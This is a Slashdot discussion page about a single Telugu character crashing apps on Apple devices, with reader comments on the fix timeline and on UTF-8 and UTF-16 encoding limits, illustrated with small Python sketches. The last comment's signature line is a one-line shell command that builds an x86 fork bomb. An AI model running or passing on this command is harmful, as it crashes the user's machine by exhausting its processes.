Mac and iOS Bug Crashes Apps With a Single Indian-Language Character (mashable.com)

Posted by msmash on Thursday February 15, 2018 @04:54AM from the watch-out dept.

A lone Indian-language character is crashing a number of messaging apps on iOS, users are reporting. The problem also extends to the Apple Watch and even Macs, all of which struggle to process the character specific to the Telugu language spoken in India.

Re:huh by Anubis+IV · 2018-02-15 06:14 · Score: 4, Informative

Ehh, the issue was fixed in the public betas before Mashable had even published their story about it.
For a better writeup, check out MacRumors' reporting on it (which was published prior to Mashable's). They mention that the bug was reported to Apple on Monday and was fixed at some point between then and now, so Apple has had a pretty quick turnaround on this one. Even so, it remains to be seen whether these fixes will be published in a minor update prior to their next intended release, or whether we'll have to wait for iOS 11.3 and macOS 10.13.4 before we get the fixes, which would likely be next month.
Meanwhile, Mashable's reporting is lagging. While they've found the time to update their article to indicate they finally managed to reproduce the issue, they apparently haven't had the time to update it with the fact that the bug was fixed before they ever wrote a word about it.

Re: A UTF8 processing failure? by Hal_Porter · 2018-02-15 06:52 · Score: 5, Informative

A lot of embedded systems will behave strangely if you feed them characters like this:
https://en.wiktionary.org/wiki...
http://www.unicode.org/cgi-bin...
That character is four bytes in UTF-8, which kills systems that assume a maximum of three - which used to be true for Chinese and Japanese, but isn't now.
It's also two UTF-16 code units (a surrogate pair), which will mess up systems that assume each character is a single 16-bit code unit.
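To make the sizes concrete, here is a minimal Python sketch that counts UTF-8 bytes and UTF-16 code units for a single code point. The links above are truncated, so the two sample characters (U+4E2D from the Basic Multilingual Plane and U+1F600 from outside it) are stand-ins chosen for illustration, and `encoding_sizes` is a hypothetical helper name.

```python
from typing import Tuple


def encoding_sizes(ch: str) -> Tuple[int, int]:
    """Return (UTF-8 byte count, UTF-16 code unit count) for a string."""
    utf8_bytes = len(ch.encode("utf-8"))
    # Each UTF-16 code unit is 2 bytes; "utf-16-le" avoids adding a BOM.
    utf16_units = len(ch.encode("utf-16-le")) // 2
    return utf8_bytes, utf16_units


# Assumed sample characters, not the ones linked in the comment.
bmp_char = "\u4e2d"         # inside the 64K Basic Multilingual Plane
astral_char = "\U0001F600"  # outside it, needs a surrogate pair in UTF-16

print(encoding_sizes(bmp_char))     # (3, 1)
print(encoding_sizes(astral_char))  # (4, 2)
```

Code that sizes buffers at three bytes per character, or one 16-bit unit per character, only holds for the first case.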
Now you'll say "Those systems are all buggy". That's true now, but it wasn't true when a lot of them were designed - Unicode used to be limited to 64K characters, which meant UCS-2 was a fixed-width encoding and three bytes was the maximum length of a character in UTF-8.
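As a rough illustration of how the fixed-width assumption goes wrong, the sketch below cuts UTF-16 data at a fixed number of 16-bit units, the way UCS-2-era code could safely do, and then checks whether the result still decodes. Both function names are hypothetical, and the sample string is an assumption; this is not taken from any particular system.

```python
def naive_truncate_utf16(text: str, max_units: int) -> bytes:
    """Cut UTF-16 data after max_units 16-bit units, ignoring surrogate pairs."""
    return text.encode("utf-16-le")[: max_units * 2]


def is_well_formed_utf16(data: bytes) -> bool:
    """Report whether the bytes decode as valid little-endian UTF-16."""
    try:
        data.decode("utf-16-le")
        return True
    except UnicodeDecodeError:
        return False


sample = "ab\U0001F600"  # two BMP characters plus one surrogate pair (4 units)

print(is_well_formed_utf16(naive_truncate_utf16(sample, 2)))  # True
print(is_well_formed_utf16(naive_truncate_utf16(sample, 3)))  # False
print(is_well_formed_utf16(naive_truncate_utf16(sample, 4)))  # True
```

Cutting at three units leaves a lone high surrogate, which is exactly the kind of input a system built for 64K characters never expected to produce or receive.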
When it grew, those assumptions ceased to be true. Which is fine for systems that are maintained - the vendor would find bugs created by the standard change and push an update. Unfortunately a lot of systems - particularly embedded ones - aren't like that. Hell, Android isn't like that. Google pushes updates out to vendors, but if your machine is EOL you're SOL.

--
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;